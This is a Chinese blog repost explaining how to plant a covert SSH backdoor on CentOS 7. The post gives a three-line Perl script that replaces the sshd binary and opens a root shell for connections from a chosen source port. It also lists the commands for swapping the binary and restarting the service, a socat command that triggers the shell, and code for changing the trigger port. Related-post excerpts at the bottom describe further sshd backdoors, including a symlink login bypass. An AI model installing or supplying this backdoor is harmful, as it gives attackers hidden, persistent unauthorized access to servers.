三行代码的SSH后门

最新推荐文章于 2025-04-01 10:49:53 发布
转载 最新推荐文章于 2025-04-01 10:49:53 发布 · 280 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:https://my.oschina.net/attacker/blog/3047121
文章标签:

#运维 #python #网络

博客围绕Python在运维中的应用展开,介绍了被控端设置,包括安装环境、源码处理和替换操作,还提及控制端测试,如修改端口。运行环境为centos7,影响范围是OpenSSH 3.9以后版本,使用python2进行相关操作。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

环境

  • centos7

影响范围:OpenSSH 3.9 以后的版本都有这样的特性

被控端设置

安装环境

rpm -qa perl ||yum install perl -y
# 查看是否安装perl环境

源码

#!/usr/bin/perl
exec"/bin/sh"if(getpeername(STDIN)=~/^..zf/);
exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV;

替换操作

mv /usr/sbin/sshd /usr/bin/sshd
# 移动默认sshd文件到其他位置

mv sshd /usr/sbin/sshd && chmod +x /usr/sbin/sshd
# 将修改的脚本放入sshd原有的位置

systemctl restart sshd
# 重启服务

控制端测试

yum install socat -y
# 安装socat工具

socat STDIO TCP4:10.0.1.125:22,sourceport=31334
# 连接目标主机

修改后们端口

python2

import struct
bigendian = struct.pack('>I',31333)
print repr(bigendian)

在perl正则匹配中将/^..zf/替换为ze

转载于:https://my.oschina.net/attacker/blog/3047121

SSH公私钥后门从入门到应急响应
记录开发和安全学习过程中的点点滴滴
09-15 1764
SSH(Secure Shell)公私钥对是一种用于认证的密技术,它允许用户通过持有私钥来远程登录服务器,而无需输入密码。这种认证方式比传统的密码认证更安全,因为它依赖于密技术来验证用户的身份。SSH公私钥后门是一种利用SSH协议的公钥认证机制来实现未授权访问的技术。在SSH协议中,除了传统的密码认证方式外,还可以使用公钥和私钥对进行认证。用户将公钥放置在服务器的文件中,之后使用对应的私钥即可登录服务器,无需输入密码。
XZ-Utils后门事件过程及启示
INSBUG的博客
04-18 1956
Jia Tan通过邮件列表补充提交了一个补丁,这个补丁的提交得到另一个邮件列表成员Jigar Kumar(非项目维护人员)在精神上的支持,因为XZ项目开发和维护进度太慢了,而Jia Tan表现的相当积极。,Jia Tan首次出现在了XZ项目的邮件列表中,称自己发现了一个bug,并在自己fork的项目中做了相关的测试代码,即没有提交PR,而是通过邮件列表积极参与项目沟通。如果不是微软的工程师Andres Freund这次意外的发现,XZ-Utils后门可能会在未来的很长一段事件里造成巨大的危害和影响。
ssh后门
weixin_34309435的博客
01-05 136
Linux SSH后门  可以让root账号有两个密码,不影响管理员正常登陆。  在includes.h 里面 修改密码,然后编译 安装.   unzip sshd.zip   cdopenssh   viversion.h   #defineSSH_VERSION"Op...
Linux系统安全之ssh后门
weixin_34321753的博客
09-30 215
1.ssh -V#查看当前的ssh版本信息#OpenSSH_5.3p1, OpenSSL 1.0.0-fips 29 Mar 20102.查找ssh的配置文件一般都在/etc/ssh中3.备份原来的文件的time将/etc/ssh下的文件的备份假设/etc/ssh/sshd_config 备份为/etc/ssh/sshd_config.old4.wget存在后门ssh#ht...
Linux 管理员的 10 个关键技巧(5)-SSH 后门
Fangrn的专栏
09-28 197
有很多次,我所在的站点需要某人的远程支持,而他却被公司防火强阻挡在外。很少有人意识到,如果能通过防火墙到达外部,那么也能轻松实现让外部的信息进来。 从本意讲,这称为 “在防火墙上砸一个洞”。我称之为 SSH 后门 。为了使用它,必须有一台作为中介的连接到 Internet 的机器。 在本例中,将这样台机器称为 blackbox.example.com。公司防火墙后面的机器称为 ginger。...
Linux 安全之SSH后门
weixin_34102807的博客
12-26 254
一.查看SSH版本[root@redkey vmshare]# ssh -V OpenSSH_5.3p1, OpenSSL 1.0.0-fips 29 Mar 2010二.下载SSH 源码包源码包:http://openbsd.org.ar/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz后门文件:http://core.ip...
警惕“信任危机”:开源组件中的后门风险与防范
最新发布
啊不行了,要长脑子了
04-01 1872
暗中收集敏感信息(如 token、账号、环境变量);上传用户数据到远程服务器;提供远程控制入口;伪装成功能代码绕过审计系统。类型描述📦包名伪造(Typosquatting)利用开发者手误或拼写接近的名字上传恶意组件,如urllibvsurlib🧑‍💻维护者被收购或账号泄露攻击者收购或接管一个流行组件的维护权,然后注入后门👻依赖链注入在某个不知名的小依赖中埋雷,从而影响主项目🧨构建脚本注入后门被插入在构建脚本(如setup.py)中,安装时执行👀看似无害的代码片段。
内网渗透—DNS隧道上线&DNS隧道通讯&SSH隧道&Linux上线CS
2301_76227305的博客
07-23 1538
记录一下最近学的隧道知识,虽然DNS隧道上线和通讯我没有复现成功。希望有大佬看到此文章,能指点一二,有偿答谢。
SSH从原理到配置
暖风吹起云之博客
04-16 1637
远程连接服务器 SSH原理 SSH配置
SSH暴力破解的应急响应实战案例
weixin_39096432的博客
12-17 1729
SSH暴力破解的应急响应实战案例 事件的起因: 在管理员的某次巡查时发现,22端口存在异常连接的IP。使用命令查看22端口的连接情况: netsatat -anpl | grep 22 跟踪排查思路: 一、排除系统账户情况 1、除了root之外是否还有其它具有特权的的用户(uid为0): awk -F: ‘$3==0{print $1}’ /etc/passwd 2、可以远程登录的账户 awk ‘/$1|$6/{print $1}’ /etc/shadow 普通用户是没有权限的 二、确认攻击情况 1、
linux 简单ssh后门,Linux 安全之SSH后门
weixin_27310417的博客
05-12 353
一.查看SSH版本[root@redkey vmshare]# ssh -VOpenSSH_5.3p1, OpenSSL 1.0.0-fips 29 Mar 2010二.下载SSH 源码包源码包:http://openbsd.org.ar/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz后门文件:http://core.ipsecs.com/roo...
ssh软连接后门
weixin_60719780的博客
05-23 745
软连接后门的原理是利用了PAM配置文件的作用,将sshd文件软连接名称设置为su,这样应用在启动过程中会去PAM配置文件中寻找是否存在对应名称的配置信息(su),su在pam_rootok只检测uid 0 即认证成功,导致可以使用任意密码去登录。
SSH后门安装
MX的博客
04-28 1716
SSH后门安装 一:前言 通过WinSCP与Linux服务器进行连接,然后配置安装SSH后门,这次实验主要目的通过实践学习熟悉Linux SSH后门的安装过程和步骤。 二:配置SSH后门 2.1:建立连接 利用winSCP工具(也可以选用其他工具)连接已知(即已经渗透成功的服务器)服务器,如图: 连接成功后: 用SecureCRT连接成功后如图: 通过ssh -V查看当前SSH版本 上传带有...
通过SSH后门(创建ssh软链接)
songling515010475的专栏
05-10 2398
一、判断sshd_config配置中的UsePAM参数是否为yes cat /etc/ssh/sshd_config 二、确认对应的pam配置文件是否包含auth sufficient pam_rootok.so配置,只在包含这件配置才可以通过ssh任意密码登录。 三、通过命令创建后门软链接,通过查看端口己监听。 ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=12345 netstat -antlp 四、通过另一台机器ssh进行任意密码登
ssh后门介绍与防御
有勇气的牛排博客
08-04 1970
文章目录1 介绍2 实战演练2.1 查看版本2.2 下载SSH配置文件2.3 安装2.4 修改后门密码and文件记录2.5 编译安装2.6 摸出痕迹3 防御ssh后门 1 介绍 当拿到root权限后,一般需要维持权限(留后门),可以做openssh后门,也就是root双密码,管理员一个密码,我们的后门一个密码。 2 实战演练 实验环境:Centos7 2.1 查看版本 ssh -v 可以对ssh备份配置文件,可以对后期的文件时间进行修改 cp -p /etc/ssh/ssh_config / etc/
倒反天罡的ssh后门 | Linux 后门系列
jijisaq的博客
04-08 2149
今天看见有安全研究员发了一篇 ssh 后门的文章,复现思考后分享给大家。
操作系统权限维持(八)之Linux系统-SSHKey后门
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-27 923
当我们具有写入权限的时候,我们同样可以自行生成密钥,当kali机器第一次生成密钥的时候,并且把公钥放在了你的服务器上面,当你把公钥放在服务器上面的时候,这就意味着他可以正常的解密和密你发过来的内容,后面你就是通过解密去认证会话的,并不需要输入密码。将 id_rsa.pub文件中的内容拷贝到目标机器上并且写入到 authorized_keys这个文件夹下。现在我们不需要密码就能连接目标机器了。
利用软链接建立 SSH 后门
fanjinhong_8521的博客
03-27 320
系统重启之后,软链接不会被删除,但这种后门方式很容易被发现,因为它可能会在系统日志、进程列表或者文件系统检查中留下痕迹。在 CentOS 7 系统上,此操作可能会失败,不过在 Kali 系统中能够成功连接。具体的失败原因可能和系统的安全策略、服务配置等因素有关。可以通过创建软链接的方式建立一个 SSH 后门,不过执行下面的命令需要使用 root 权限。为了让这个后门在系统重启之后依然能够自动启动,可以把它配置成系统的自启动服务。此命令的作用是重新载 Systemd 管理器的配置,让新创建的服务文件生效。
SSH整合三大框架源代码解析与配置指南
从提供的文件信息中,...从文件信息来看,这个整合源代码的项目是用于教学和演示目的的,它不仅整合了SSH三大框架,还演示了一些基本的Web应用功能。同时,这个项目为学习SSH框架和Java Web开发提供了很好的实践材料。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值